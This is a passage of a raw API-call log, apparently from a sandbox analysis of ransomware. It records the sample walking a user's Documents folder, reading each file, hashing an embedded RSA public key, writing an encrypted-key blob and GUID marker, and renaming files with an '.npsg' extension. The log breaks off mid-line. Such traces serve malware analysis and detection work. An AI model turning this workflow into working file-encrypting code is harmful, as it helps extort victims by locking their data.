lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b8a050, ftCreationTime.dwHighDateTime=0x1d56b2f, ftLastAccessTime.dwLowDateTime=0xf33a34b0, ftLastAccessTime.dwHighDateTime=0x1d576f9, ftLastWriteTime.dwLowDateTime=0xf33a34b0, ftLastWriteTime.dwHighDateTime=0x1d576f9, nFileSizeHigh=0x0, nFileSizeLow=0x6db5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vm9n1b-JvhEE9EjmUe.xlsx", cAlternateFileName="VM9N1B~1.XLS")) returned 1 [0236.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.818] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vm9n1b-JvhEE9EjmUe.xlsx") returned=".xlsx" [0236.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vm9n1b-JvhEE9EjmUe.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vm9n1b-jvhee9ejmue.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.818] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=28085) returned 1 [0236.818] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.821] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x6d8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.821] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.822] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x6db5, lpOverlapped=0x0) returned 1 [0236.823] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.823] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.823] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.823] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.824] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.824] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.824] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.824] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.824] GetLastError () returned 0x0 [0236.824] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.824] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.824] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.824] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.824] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.825] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b88a98 [0236.825] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x6db5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.825] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.825] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.825] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.825] CloseHandle (hObject=0x644) returned 1 [0236.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b81cd0 [0236.826] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vm9n1b-JvhEE9EjmUe.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vm9n1b-jvhee9ejmue.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Vm9n1b-JvhEE9EjmUe.xlsx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vm9n1b-jvhee9ejmue.xlsx.npsg")) returned 1 [0236.828] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9948a30, ftCreationTime.dwHighDateTime=0x1d5b5e0, ftLastAccessTime.dwLowDateTime=0x21a042d0, ftLastAccessTime.dwHighDateTime=0x1d5bcd3, ftLastWriteTime.dwLowDateTime=0x21a042d0, ftLastWriteTime.dwHighDateTime=0x1d5bcd3, nFileSizeHigh=0x0, nFileSizeLow=0xc4d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VQlKr6m_vK4.doc", cAlternateFileName="VQLKR6~1.DOC")) returned 1 [0236.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.828] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VQlKr6m_vK4.doc") returned=".doc" [0236.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VQlKr6m_vK4.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vqlkr6m_vk4.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.828] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=50385) returned 1 [0236.828] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.831] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xc4ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.831] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.832] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.832] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xc4d1, lpOverlapped=0x0) returned 1 [0236.833] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.833] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.833] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.833] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.834] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.834] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.834] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.834] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.834] GetLastError () returned 0x0 [0236.834] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.834] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.834] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.834] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.834] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc4d0) returned 0x3b95d50 [0236.835] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b958f0 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400338 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95938 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400350 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400380 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003e0 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400398 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.835] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b81cd0 [0236.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400380 | out: hHeap=0x620000) returned 1 [0236.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400398 | out: hHeap=0x620000) returned 1 [0236.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003e0 | out: hHeap=0x620000) returned 1 [0236.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003e0 [0236.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400398 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400380 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400398 | out: hHeap=0x620000) returned 1 [0236.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400380 | out: hHeap=0x620000) returned 1 [0236.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003e0 | out: hHeap=0x620000) returned 1 [0236.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.836] GetCurrentThreadId () returned 0x5b4 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b796a8 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.837] GetCurrentThreadId () returned 0x5b4 [0236.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.837] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xc4d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.837] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.838] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.838] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.838] CloseHandle (hObject=0x644) returned 1 [0236.839] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VQlKr6m_vK4.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vqlkr6m_vk4.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VQlKr6m_vK4.doc.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vqlkr6m_vk4.doc.npsg")) returned 1 [0236.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.840] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0236.841] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9467df90, ftCreationTime.dwHighDateTime=0x1d5bdea, ftLastAccessTime.dwLowDateTime=0x1ea7f740, ftLastAccessTime.dwHighDateTime=0x1d5c03d, ftLastWriteTime.dwLowDateTime=0x1ea7f740, ftLastWriteTime.dwHighDateTime=0x1d5c03d, nFileSizeHigh=0x0, nFileSizeLow=0x16da6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VwYs.rtf", cAlternateFileName="")) returned 1 [0236.841] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VwYs.rtf") returned=".rtf" [0236.841] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VwYs.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vwys.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.841] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=93606) returned 1 [0236.841] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.844] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.844] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.846] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x16da6, lpOverlapped=0x0) returned 1 [0236.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.847] lstrlenA (lpString="-----BEGIN PUBLIC 